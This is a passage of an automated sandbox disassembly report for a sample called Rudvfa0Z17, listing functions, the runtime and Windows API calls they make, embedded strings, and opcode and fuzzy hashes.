                                • Opcode Fuzzy Hash: 8de73a8d6d35abf6caafc5abf604a63440bf3942a8bffda7b7bb9bba62447ef1
                                • Instruction Fuzzy Hash: F2A125B2D00204AFD714DFA8DC42B9EBBB4EF54314F14826EE505973D2DB79AA04CB99
                                Function 004264F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 198COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00426521
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                  • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                • _memmove.LIBCMT ref: 004265A1
                                • _memmove.LIBCMT ref: 004265C1
                                • _memmove.LIBCMT ref: 00426625
                                • _memmove.LIBCMT ref: 00426694
                                • _memmove.LIBCMT ref: 004266B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 4034224661-3788999226
                                • Opcode ID: fd12ecff2559e19210882c1212e8c891f829e42ea673c1630522b0646557dea9
                                • Instruction ID: e5f475aa06b6f66695a792dac7957df42c754e219a437cd28c0919f3fa743700
                                • Opcode Fuzzy Hash: fd12ecff2559e19210882c1212e8c891f829e42ea673c1630522b0646557dea9
                                • Instruction Fuzzy Hash: 5A61D872B001159FCB08CF68D8859AE77A5EF94310F59C66EEC06DB348E634EE04CB94
                                Function 00403470 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 171COMMON
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSection.KERNEL32(0073EFB8,3F7259E2), ref: 004034B1
                                  • Part of subcall function 00403990: __time64.LIBCMT ref: 004039B4
                                  • Part of subcall function 00403990: __localtime64_s.LIBCMT ref: 004039C7
                                  • Part of subcall function 00403990: _memset.LIBCMT ref: 004039E2
                                  • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405539
                                  • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 0040555A
                                  • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405578
                                  • Part of subcall function 00405520: _memmove.LIBCMT ref: 004055EF
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00403570
                                • std::_Lockit::_Lockit.LIBCPMT ref: 004035B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::_$Xinvalid_argument$LockitLockit::_$CriticalInitializeSection__localtime64_s__time64_memmove_memset
                                • String ID: --------------------------------------$.log$Open the log file$log\JumpLogin-
                                • API String ID: 1179081484-4002143626
                                • Opcode ID: 40f8ac4b9d59971e42a7fe8ea193fecb976f05dea2bc2a1b2d33739cbc19fb5b
                                • Instruction ID: dd81093e7cbe42572f97faa9210dcb4426a2d0b84738156c4183c5335d05110a
                                • Opcode Fuzzy Hash: 40f8ac4b9d59971e42a7fe8ea193fecb976f05dea2bc2a1b2d33739cbc19fb5b
                                • Instruction Fuzzy Hash: 06510571E00208DBCB10DFA9CC81A9EFBB5EF45705F14852AE915BB3C5DB789A04CB99
                                Function 00425B60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,004185EA,3F7259E2,?,00418496,00000002,000000FF,?,00422084), ref: 00425BCE
                                  • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                • GdipCreateSolidFill.GDIPLUS(FF000000,?), ref: 00425C2D
                                • GdipSetStringFormatAlign.GDIPLUS(F44D8B00,00000001), ref: 00425C9B
                                • GdipSetStringFormatLineAlign.GDIPLUS(F44D8B00,00000001), ref: 00425CB4
                                • SendMessageW.USER32(73F0D80D,00000403,00000000,00000064), ref: 00425CF1
                                • SendMessageW.USER32(73F0D80D,00000418,00000000,000000C8), ref: 00425D06
                                  • Part of subcall function 00422E40: GdipCreateFontFamilyFromName.GDIPLUS(Arial,00000000,?,?), ref: 00422E5B
                                  • Part of subcall function 00422E40: GdipGetGenericFontFamilySansSerif.GDIPLUS(0073EDC0), ref: 00422E8B
                                  • Part of subcall function 00422E40: GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422EAA
                                  • Part of subcall function 00426490: _memmove.LIBCMT ref: 004264BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Gdip$CreateFamilyFontFormatString$AlignMessageSend$DeleteFillFromGenericLineNameSansSerifSolid_malloc_memmove
                                • String ID: Arial
                                • API String ID: 3100294967-493054409
                                • Opcode ID: 82ee6678e9349ef2875ab0e1218352f163ed62a80c16b66f4e30fd1494a2dcc3
                                • Instruction ID: 7f92a7e877333cee7bf1d2e5f056fe5c7ee1866b486c49faf119884e683556c2
                                • Opcode Fuzzy Hash: 82ee6678e9349ef2875ab0e1218352f163ed62a80c16b66f4e30fd1494a2dcc3
                                • Instruction Fuzzy Hash: E0518EB1600301AFEB04DF65DC85BAA7BF8BB44700F14867AE909DF386EB74A504CB64
                                Function 00539561 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005394AF: GetParent.USER32(?), ref: 00539503
                                  • Part of subcall function 005394AF: GetLastActivePopup.USER32(?), ref: 00539514
                                  • Part of subcall function 005394AF: IsWindowEnabled.USER32(?), ref: 00539528
                                  • Part of subcall function 005394AF: EnableWindow.USER32(?,00000000), ref: 0053953B
                                • EnableWindow.USER32(?,00000001), ref: 005395AE
                                • GetWindowThreadProcessId.USER32(?,?), ref: 005395C2
                                • GetCurrentProcessId.KERNEL32(?,?), ref: 005395CC
                                • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 005395E4
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00539660
                                • EnableWindow.USER32(00000000,00000001), ref: 005396A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                • String ID: 8@
                                • API String ID: 1877664794-819625340
                                • Opcode ID: 7847638c9822e494ba1cb4b1276f38bdd4c01cb8e1f561ec198642636f7e72e6
                                • Instruction ID: 92bc13bd50d1c053b23345177d6c3dab201e50520268075aec8d8323af4d1383
                                • Opcode Fuzzy Hash: 7847638c9822e494ba1cb4b1276f38bdd4c01cb8e1f561ec198642636f7e72e6
                                • Instruction Fuzzy Hash: A741C5B2A01319AFDB219F64DC89BAABBB9FF44310F140599F415E7191D7B0CE808FA0
                                Function 00595EDA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00595EE1
                                  • Part of subcall function 0054B1CD: __EH_prolog3.LIBCMT ref: 0054B1D4
                                  • Part of subcall function 00613C22: SetRectEmpty.USER32(?), ref: 00613C52
                                • SetRectEmpty.USER32(?), ref: 00596029
                                • SetRectEmpty.USER32(?), ref: 00596038
                                • SetRectEmpty.USER32(?), ref: 00596041
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: EmptyRect$H_prolog3
                                • String ID: <m$False$True
                                • API String ID: 3752103406-2469294776
                                • Opcode ID: aaa1380dfcdce5ddaf7007cffbcc971216337e4c7013eafe28cebce79d908eb0
                                • Instruction ID: df13e06cf9fb51d7e9569a7b0836c1fca328eb2faebcd8c1f3dc25fb0e9e690d
                                • Opcode Fuzzy Hash: aaa1380dfcdce5ddaf7007cffbcc971216337e4c7013eafe28cebce79d908eb0
                                • Instruction Fuzzy Hash: 92519CB0801B418FC362EF7AC5857DAFBE8BFA5304F10595FD0AE962A1CBB42644CB15
                                Function 00402440 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                • std::locale::_Init.LIBCPMT ref: 004024B4
                                • std::_Lockit::_Lockit.LIBCPMT ref: 004024BD
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004024E9
                                • std::_Xinvalid_argument.LIBCPMT ref: 00402532
                                • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00402541
                                  • Part of subcall function 00403BF0: _free.LIBCMT ref: 00403C05
                                  • Part of subcall function 00403BF0: _malloc.LIBCMT ref: 00403C2D
                                  • Part of subcall function 00403BF0: _memmove.LIBCMT ref: 00403C3E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::_$_mallocstd::locale::_$InitLocimp::_Locinfo::_Locinfo_ctorLockitLockit::_MakelocXinvalid_argument_free_memmove
                                • String ID: bad locale name$chs
                                • API String ID: 2402735708-3828856240
                                • Opcode ID: 2ea933c890a4a8e7387b443e98d64d2454118bce2f2a9462a5fc9814065aff5e
                                • Instruction ID: 0ba4dabfef8362b40dd62f4289b6948131dcb20ba18949e055e96b8ca92e1267
                                • Opcode Fuzzy Hash: 2ea933c890a4a8e7387b443e98d64d2454118bce2f2a9462a5fc9814065aff5e
                                • Instruction Fuzzy Hash: EE4125B1C04288AECB10DFA8C981AAEFFB6AF25310F54457EE541A33C1D3795A0CC759
                                Function 0041DF70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041DF9D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041DFC0
                                • std::bad_exception::bad_exception.LIBCMT ref: 0041E044
                                • __CxxThrowException@8.LIBCMT ref: 0041E052
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041E065
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041E07F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2427920155-3145022300
                                • Opcode ID: b275e407ffd772c85200b397ff873c011073643755b96022c06a5570a7028a9e
                                • Instruction ID: 78e5d98d9483bb3070d4137d2c4f27e99fadb8ccf3661470edd8c3973bd89120
                                • Opcode Fuzzy Hash: b275e407ffd772c85200b397ff873c011073643755b96022c06a5570a7028a9e
                                • Instruction Fuzzy Hash: 8931F075800214CFDB14DF55D882BEE7BA4FB04321F04861EEC12A72D1CB79AE45CB99
                                Function 006620C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 006620CF
                                • std::_Lockit::_Lockit.LIBCPMT ref: 006620D9
                                • int.LIBCPMT ref: 006620F0
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • std::bad_exception::bad_exception.LIBCMT ref: 00662127
                                • __CxxThrowException@8.LIBCMT ref: 00662135
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066214B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2227438316-3145022300
                                • Opcode ID: 68625419d1e46fb87a2bd96cbae347e6e82734de59dab652bb2c3044e45e871a
                                • Instruction ID: dbae5003dd7b1a917c6ba333b8899da3fed0e2df6253afcbe04d7b6e044a327d
                                • Opcode Fuzzy Hash: 68625419d1e46fb87a2bd96cbae347e6e82734de59dab652bb2c3044e45e871a
                                • Instruction Fuzzy Hash: 4F01A13190021A9BCB05EBA0D852AFDB727AF41721F14011DFA117B2D1DF789A458799
                                Function 006612B3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 006612BA
                                • std::_Lockit::_Lockit.LIBCPMT ref: 006612C4
                                • int.LIBCPMT ref: 006612DB
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • std::bad_exception::bad_exception.LIBCMT ref: 00661312
                                • __CxxThrowException@8.LIBCMT ref: 00661320
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661336
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2227438316-3145022300
                                • Opcode ID: 478dfa9bf221e19db388ce8db3ce22621b59aa958bb283efbc7e3a7c4fa525ee
                                • Instruction ID: 8f0eb705d629243e1d61d080c535eb92b12c8b0dcfae7b8d4eccacccd604cadb
                                • Opcode Fuzzy Hash: 478dfa9bf221e19db388ce8db3ce22621b59aa958bb283efbc7e3a7c4fa525ee
                                • Instruction Fuzzy Hash: 0201AD329002599BCB05EBB0C852AFE7727AF81720F24012DF9117B2D1DF78AE458B99
                                Function 0066C4E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066C4EC
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066C4F6
                                • int.LIBCPMT ref: 0066C50D
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066C544
                                • __CxxThrowException@8.LIBCMT ref: 0066C552
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C568
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2227438316-3145022300
                                • Opcode ID: 115021aecaad854839767955b3c3cc940e4c98a18ee708eb2b21f54e70f46e1d
                                • Instruction ID: 19471a1755b04b480c34b96f97f8b0ff5e08ee88c414c319f28c5d6c97c327ab
                                • Opcode Fuzzy Hash: 115021aecaad854839767955b3c3cc940e4c98a18ee708eb2b21f54e70f46e1d
                                • Instruction Fuzzy Hash: 6201C0319006099BCB05EBB0DC52AFE7737AF80720F24051DF9117B2D1DF78AA459799
                                Function 00661EF1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00661EF8
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00661F02
                                • int.LIBCPMT ref: 00661F19
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • std::bad_exception::bad_exception.LIBCMT ref: 00661F50
                                • __CxxThrowException@8.LIBCMT ref: 00661F5E
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661F74
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2227438316-3145022300
                                • Opcode ID: 030c3ac3221abdecf229f796243e43403722d1f972e7e3d8899abf85c64e4ff3
                                • Instruction ID: 1db65516f59b5ce27a9d3c96ffc7851b257e255ef8e8e758242c989982d1c801
                                • Opcode Fuzzy Hash: 030c3ac3221abdecf229f796243e43403722d1f972e7e3d8899abf85c64e4ff3
                                • Instruction Fuzzy Hash: 2D01AD319002099BCB05EBB0D842AFE7767AF81721F28051DF9117B2E1CF78AA059799
                                Function 005488FA Relevance: 12.2, APIs: 8, Instructions: 188memoryCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00548901
                                • VariantInit.OLEAUT32(?), ref: 00548931
                                • VariantInit.OLEAUT32(?), ref: 00548937
                                • VariantClear.OLEAUT32(?), ref: 00548983
                                • VariantClear.OLEAUT32(?), ref: 00548989
                                  • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                  • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                • SysAllocStringLen.OLEAUT32(?,00000005), ref: 005489E4
                                • VariantClear.OLEAUT32(?), ref: 00548A9A
                                • VariantClear.OLEAUT32(?), ref: 00548AA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Variant$Clear$H_prolog3Init$AllocException@8StringThrow
                                • String ID:
                                • API String ID: 1678399783-0
                                • Opcode ID: 7a6f76681128b471c6c50e5ddf5e35621f1b4520f70280eff8427a43aba1fe46
                                • Instruction ID: a378faf91b6559feb438f4b9f25e43d69ddbce47b6a1d649b240fc32f42776ac
                                • Opcode Fuzzy Hash: 7a6f76681128b471c6c50e5ddf5e35621f1b4520f70280eff8427a43aba1fe46
                                • Instruction Fuzzy Hash: 84614D7190024ADFCF10DFE4C8889BEBBB9BF49314B28486EE515EB250CB759E45CB51
                                Function 0054381D Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
